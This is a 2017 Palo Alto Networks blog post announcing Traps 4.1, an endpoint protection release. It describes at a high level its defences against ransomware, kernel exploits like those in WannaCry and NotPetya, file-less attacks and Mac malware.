* [Blog](https://www2.paloaltonetworks.com/blog)
* [Palo Alto Networks](https://www2.paloaltonetworks.com/blog/corporate/)
* [Announcement](https://www2.paloaltonetworks.com/blog/category/announcement/)
* Traps: Expanding Ransomwa...

# Traps: Expanding Ransomware Protection for Current and Future Threats

[](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fwww2.paloaltonetworks.com%2Fblog%2F2017%2F09%2Ftraps-4-1%2F)  
[](https://twitter.com/share?text=Traps%3A+Expanding+Ransomware+Protection+for+Current+and+Future+Threats&url=https%3A%2F%2Fwww2.paloaltonetworks.com%2Fblog%2F2017%2F09%2Ftraps-4-1%2F)  
[](https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fwww2.paloaltonetworks.com%2Fblog%2F2017%2F09%2Ftraps-4-1%2F&title=Traps%3A+Expanding+Ransomware+Protection+for+Current+and+Future+Threats&summary=&source=)  
[](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https://www2.paloaltonetworks.com/blog/2017/09/traps-4-1/&ts=markdown)  
\[\](mailto:?subject=Traps: Expanding Ransomware Protection for Current and Future Threats)  
Link copied  
By [Joel Boyd](https://www.paloaltonetworks.com/blog/author/joel-boyd/?ts=markdown "Posts by Joel Boyd")  
Sep 19, 2017  
5 minutes  
[Announcement](https://www.paloaltonetworks.com/blog/category/announcement/?ts=markdown)  
[Endpoint](https://www.paloaltonetworks.com/blog/category/endpoint-2/?ts=markdown)  
[Advanced Endpoint Protection](https://www.paloaltonetworks.com/blog/tag/advanced-endpoint-protection/?ts=markdown)  
[Traps](https://www.paloaltonetworks.com/blog/tag/traps/?ts=markdown)  
[Traps 4.1](https://www.paloaltonetworks.com/blog/tag/traps-4-1/?ts=markdown)

Today [we announced the next iteration of Traps advanced endpoint protection](https://www.paloaltonetworks.com/company/press/2017/palo-alto-networks-strengthens-ransomware-prevention-capabilities-with-new-traps-advanced-endpoint-functionality), Traps 4.1. With this release, we continue to develop our innovative, multi-method prevention approach to endpoint security with a specific focus on preventing ransomware.

Many estimates put the total value of ransoms paid out in 2016 at more than $1 billion^1^, but the ransom payout itself often pales in comparison to the frustration that follows...

* Engaging disaster recovery on a massive scale
* Bringing user machines back, and larger production and operation systems back online
* Dealing with low employee morale, loss of productivity and potential breach notifications
* Figuring out how to prevent an attack from happening again
* Determining whether the organization is still vulnerable

The majority of ransomware causes damage in less than a minute^2^, far too quickly for endpoint detection and response or manual intervention to counter it. For that matter, neither will fix the underlying issue: ransomware has compromised user machines, and the organization is still vulnerable to additional and ongoing attacks. Compounding concerns, those relying on signature updates have large windows of vulnerability. While the speed of signature updates has improved, if an organization in a signature-based threat-sharing community is infected, it can take hours or days to create and distribute a signature from "patient zero" -- much longer than the minutes ransomware needs to spread to other machines. Additionally, the ransomware market itself continues to evolve. "Ransomware as a service" has sprung up, giving even novice attackers access to advanced techniques. Furthermore, recent leaks, along with the re-emergence of exploits to circumvent the need for user action, have given rise to script-based and file-less attacks that pose issues for products or tools that rely heavily on analyzing file characteristics.

## **Key New Features in Traps 4.1**

> *"It has been exciting to see the evolution of Traps. Red Sky is proud to be an early adopter of the technology and has been heavily integrated with the product development lifecycle. With the new game changing additions of anti-ransomware for Windows and static analysis on macOS, Traps has been lab tested and proven to be an industry leader in prevention based endpoint protection."*
> 
> Phil Wong | Security Practice Lead at Red Sky

## **New Exploits and Ransomware**

While thousands of exploits exist, only a handful of exploit techniques are used. Traps focuses on these techniques to effectively shut down exploit-based attacks, rather than relying on signatures or attempting to chase each exploit. Recently, a new technique was seen in both WannaCry and NotPetya that directly exploits and utilizes the kernel. Despite Microsoft delivering a patch of the discovered Server Message Block vulnerability in Windows, many organizations were vulnerable to the first step of attack -- exploiting the SMB -- simply because they hadn't patched their systems. The second step installs the now-infamous DoublePulsar, a powerful backdoor tool that runs in kernel mode and can load shellcode from the kernel into process memory, calling legitimate processes to run the shellcode and potentially leading to a file-less attack.

**Enhanced kernel exploit protection**: While Traps was already capable of blocking actions aimed at gaining kernel access through privilege escalation, this new kernel exploit prevention protects against exploit techniques used to execute malicious payloads, such as those seen in WannaCry and NotPetya. By blocking processes from accessing injected malicious code, Traps is now able to prevent the attacks early in the attack lifecycle without impacting legitimate processes.

**Behavior-based ransomware protection**: In this release, we've introduced a capability solely focused on ransomware, rather than malware in general. In addition to existing preventions, Traps will now monitor specifically for ransomware behavior and, upon detection, block the attack and encryption of customer data without interfering with legitimate encryption tools.

## **Script-Based and File-Less Attacks**

Many approaches to malware prevention, both legacy and next-generation, have revolved around analyzing features and characteristics of a file. However, attackers have learned to manipulate legitimate processes and engage in script-based attacks that may not involve files.

\*\*Granular child process protection and malicious DLL prevention:\*\*With 4.1, Traps enhances its ability to ensure legitimate processes are running how and when they should, adding command-line evaluation of a process to its existing blacklisting and whitelisting abilities to prevent this emerging breed of attack. Additionally, attacks are increasingly utilizing DLLs, rather than traditional executable files, to run their malicious endeavors. To counter this, we've added the examination of DLLs to both our local and cloud-based WildFire analysis techniques for known and unknown malware.

## **The Rise of Mac Malware**

Though malware on macOS is still a growing field, attackers know that where there's an assumption of safety, there's opportunity for profit. As an example, in early May 2017, a well-known Windows backdoor malware, Snake, was ported to Mac for the first time. As Mac use continues to grow throughout enterprises, it's important that security teams take actions to ensure users are safe.

**Local analysis on macOS**: Traps continues to take a multi-method prevention approach to securing customers' Mac endpoints. With 4.0, Traps delivered exploit protection specific to macOS, as well as enhanced Gatekeeper protection and WildFire integration for known malware. With 4.1, we've added local analysis capabilities to detect and prevent unknown variants on macOS, further securing our customers.

## **Where Can I Learn More?**

* [Sign-up for a live demo](https://www.eiseverywhere.com/ehome/270986) of Traps.
* Check out how Traps prevents popular attacks such as [Astrum](https://www.paloaltonetworks.com/blog/2017/07/how-traps-protects-against-astrum/), [Ursnif](https://www.paloaltonetworks.com/blog/2017/06/traps-sniffs-ursnif-banking-trojan/), and [Cerber](https://www.paloaltonetworks.com/blog/2017/04/traps-prevents-cerber-ransomwares-bite/).
* [Read-up on the "patient zero" problem](http://go.paloaltonetworks.com/IDCTechSpotlight) in an IDC white paper that examines modern endpoint protection and how the evolution of malware has created a need for a modern approach to endpoint protection.
* Check out the [New Feature Guide](https://www.paloaltonetworks.com/documentation/41/endpoint/newfeaturesguide.html) for details on our new capabilities

1: [https://www.nbcnews.com/tech/security/ransomware-now-billion-dollar-year-crime-growing-n704646](https://www.nbcnews.com/tech/security/ransomware-now-billion-dollar-year-crime-growing-n704646)

2: [https://blog.barkly.com/how-fast-does-ransomware-encrypt-files](https://blog.barkly.com/how-fast-does-ransomware-encrypt-files)

*** ** * ** ***

## Related Blogs

### [Endpoint](https://www.paloaltonetworks.com/blog/category/endpoint-2/?ts=markdown), [Products and Services](https://www.paloaltonetworks.com/blog/category/products-and-services/?ts=markdown), [Secure the Enterprise](https://www.paloaltonetworks.com/blog/category/secure-the-enterprise/?ts=markdown)

[#### Introducing Traps for Android](https://www2.paloaltonetworks.com/blog/2018/06/introducing-traps-android/)

### [Company \& Culture](https://www.paloaltonetworks.com/blog/category/company-culture/?ts=markdown), [Endpoint](https://www.paloaltonetworks.com/blog/category/endpoint-2/?ts=markdown), [Products and Services](https://www.paloaltonetworks.com/blog/category/products-and-services/?ts=markdown)

[#### Traps "Recommended" in NSS Labs Advanced Endpoint Protection Test](https://www2.paloaltonetworks.com/blog/2018/04/traps-recommended-nss-labs-advanced-endpoint-protection-test/)

### [Endpoint](https://www.paloaltonetworks.com/blog/category/endpoint-2/?ts=markdown)

[#### Traps Prevents Ransomware Attacks](https://www2.paloaltonetworks.com/blog/2017/11/traps-prevents-ransomware-attacks/)

### [Endpoint](https://www.paloaltonetworks.com/blog/category/endpoint-2/?ts=markdown)

[#### Traps Prevents Microsoft Office Zero-Day](https://www2.paloaltonetworks.com/blog/2017/10/traps-prevents-microsoft-office-zero-day/)

### [Endpoint](https://www.paloaltonetworks.com/blog/category/endpoint-2/?ts=markdown)

[#### AV-TEST Validated: Traps Can Replace Legacy Antivirus](https://www2.paloaltonetworks.com/blog/2017/08/av-test-validated-traps-can-replace-legacy-antivirus/)

### [Endpoint](https://www.paloaltonetworks.com/blog/category/endpoint-2/?ts=markdown)

[#### Traps Sniffs Out Ursnif Banking Trojan](https://www2.paloaltonetworks.com/blog/2017/06/traps-sniffs-ursnif-banking-trojan/)

### Subscribe to the Blog!

Sign up to receive must-read articles, Playbooks of the Week, new feature announcements, and more.
![spinner](https://www2.paloaltonetworks.com/blog/wp-content/themes/panwblog2023/dist/images/ajax-loader.gif) Sign up  
Please enter a valid email.  
By submitting this form, you agree to our [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use?ts=markdown) and acknowledge our [Privacy Statement](https://www.paloaltonetworks.com/legal-notices/privacy?ts=markdown). Please look for a confirmation email from us. If you don't receive it in the next 10 minutes, please check your spam folder.  
This site is protected by reCAPTCHA and the Google [Privacy Policy](https://policies.google.com/privacy) and [Terms of Service](https://policies.google.com/terms) apply.  
{#footer} {#footer}

## Products and Services

* [AI-Powered Network Security Platform](https://www.paloaltonetworks.com/network-security?ts=markdown)

* [Secure AI by Design](https://www.paloaltonetworks.com/precision-ai-security/secure-ai-by-design?ts=markdown)

* [Prisma AIRS](https://www.paloaltonetworks.com/prisma/prisma-ai-runtime-security?ts=markdown)

* [AI Access Security](https://www.paloaltonetworks.com/sase/ai-access-security?ts=markdown)

* [Cloud Delivered Security Services](https://www.paloaltonetworks.com/network-security/security-subscriptions?ts=markdown)

* [Advanced Threat Prevention](https://www.paloaltonetworks.com/network-security/advanced-threat-prevention?ts=markdown)

* [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering?ts=markdown)

* [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire?ts=markdown)

* [Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security?ts=markdown)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention?ts=markdown)

* [Enterprise IoT Security](https://www.paloaltonetworks.com/network-security/enterprise-device-security?ts=markdown)

* [Medical IoT Security](https://www.paloaltonetworks.com/network-security/medical-device-security?ts=markdown)

* [Industrial OT Security](https://www.paloaltonetworks.com/network-security/medical-device-security?ts=markdown)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security?ts=markdown)

* [Next-Generation Firewalls](https://www.paloaltonetworks.com/network-security/next-generation-firewall?ts=markdown)

* [Hardware Firewalls](https://www.paloaltonetworks.com/network-security/hardware-firewall-innovations?ts=markdown)

* [Software Firewalls](https://www.paloaltonetworks.com/network-security/software-firewalls?ts=markdown)

* [Strata Cloud Manager](https://www.paloaltonetworks.com/network-security/strata-cloud-manager?ts=markdown)

* [SD-WAN for NGFW](https://www.paloaltonetworks.com/network-security/sd-wan-subscription?ts=markdown)

* [PAN-OS](https://www.paloaltonetworks.com/network-security/pan-os?ts=markdown)

* [Panorama](https://www.paloaltonetworks.com/network-security/panorama?ts=markdown)

* [Secure Access Service Edge](https://www.paloaltonetworks.com/sase?ts=markdown)

* [Prisma SASE](https://www.paloaltonetworks.com/sase?ts=markdown)

* [Application Acceleration](https://www.paloaltonetworks.com/sase/app-acceleration?ts=markdown)

* [Autonomous Digital Experience Management](https://www.paloaltonetworks.com/sase/adem?ts=markdown)

* [Enterprise DLP](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention?ts=markdown)

* [Prisma Access](https://www.paloaltonetworks.com/sase/access?ts=markdown)

* [Prisma Browser](https://www.paloaltonetworks.com/sase/prisma-browser?ts=markdown)

* [Prisma SD-WAN](https://www.paloaltonetworks.com/sase/sd-wan?ts=markdown)

* [Remote Browser Isolation](https://www.paloaltonetworks.com/sase/remote-browser-isolation?ts=markdown)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security?ts=markdown)

* [AI-Driven Security Operations Platform](https://www.paloaltonetworks.com/cortex?ts=markdown)

* [Cloud Security](https://www.paloaltonetworks.com/cortex/cloud?ts=markdown)

* [Cortex Cloud](https://www.paloaltonetworks.com/cortex/cloud?ts=markdown)

* [Application Security](https://www.paloaltonetworks.com/cortex/cloud/application-security?ts=markdown)

* [Cloud Posture Security](https://www.paloaltonetworks.com/cortex/cloud/cloud-posture-security?ts=markdown)

* [Cloud Runtime Security](https://www.paloaltonetworks.com/cortex/cloud/runtime-security?ts=markdown)

* [Prisma Cloud](https://www.paloaltonetworks.com/prisma/cloud?ts=markdown)

* [AI-Driven SOC](https://www.paloaltonetworks.com/cortex?ts=markdown)

* [Cortex XSIAM](https://www.paloaltonetworks.com/cortex/cortex-xsiam?ts=markdown)

* [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr?ts=markdown)

* [Cortex XSOAR](https://www.paloaltonetworks.com/cortex/cortex-xsoar?ts=markdown)

* [Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse?ts=markdown)

* [Unit 42 Managed Detection \& Response](https://www.paloaltonetworks.com/cortex/managed-detection-and-response?ts=markdown)

* [Managed XSIAM](https://www.paloaltonetworks.com/cortex/managed-xsiam?ts=markdown)

* [Threat Intel and Incident Response Services](https://www.paloaltonetworks.com/unit42?ts=markdown)

* [Proactive Assessments](https://www.paloaltonetworks.com/unit42/assess?ts=markdown)

* [Incident Response](https://www.paloaltonetworks.com/unit42/respond?ts=markdown)

* [Transform Your Security Strategy](https://www.paloaltonetworks.com/unit42/transform?ts=markdown)

* [Discover Threat Intelligence](https://www.paloaltonetworks.com/unit42/threat-intelligence-partners?ts=markdown)

## Company

* [About Us](https://www.paloaltonetworks.com/about-us?ts=markdown)
* [Careers](https://jobs.paloaltonetworks.com/en/)
* [Contact Us](https://www.paloaltonetworks.com/company/contact-sales?ts=markdown)
* [Corporate Responsibility](https://www.paloaltonetworks.com/about-us/corporate-responsibility?ts=markdown)
* [Customers](https://www.paloaltonetworks.com/customers?ts=markdown)
* [Investor Relations](https://investors.paloaltonetworks.com/)
* [Location](https://www.paloaltonetworks.com/about-us/locations?ts=markdown)
* [Newsroom](https://www.paloaltonetworks.com/company/newsroom?ts=markdown)

## Popular Links

* [Blog](https://www.paloaltonetworks.com/blog/?ts=markdown)
* [Communities](https://www.paloaltonetworks.com/communities?ts=markdown)
* [Content Library](https://www.paloaltonetworks.com/resources?ts=markdown)
* [Cyberpedia](https://www.paloaltonetworks.com/cyberpedia?ts=markdown)
* [Event Center](https://events.paloaltonetworks.com/)
* [Manage Email Preferences](https://start.paloaltonetworks.com/preference-center)
* [Products A-Z](https://www.paloaltonetworks.com/products/products-a-z?ts=markdown)
* [Product Certifications](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance?ts=markdown)
* [Report a Vulnerability](https://www.paloaltonetworks.com/security-disclosure?ts=markdown)
* [Sitemap](https://www.paloaltonetworks.com/sitemap?ts=markdown)
* [Tech Docs](https://docs.paloaltonetworks.com/)
* [Unit 42](https://unit42.paloaltonetworks.com/)
* [Do Not Sell or Share My Personal Information](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![PAN logo](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/pan-logo-dark.svg)
* [Privacy](https://www.paloaltonetworks.com/legal-notices/privacy?ts=markdown)
* [Trust Center](https://www.paloaltonetworks.com/legal-notices/trust-center?ts=markdown)
* [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use?ts=markdown)
* [Documents](https://www.paloaltonetworks.com/legal?ts=markdown)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![Youtube](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![Podcast](https://www.paloaltonetworks.com/content/dam/pan/en_US/images/icons/podcast.svg)](https://www.paloaltonetworks.com/podcasts/threat-vector?ts=markdown)
* [![Facebook](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![LinkedIn](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![Twitter](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* EN  
  Select your language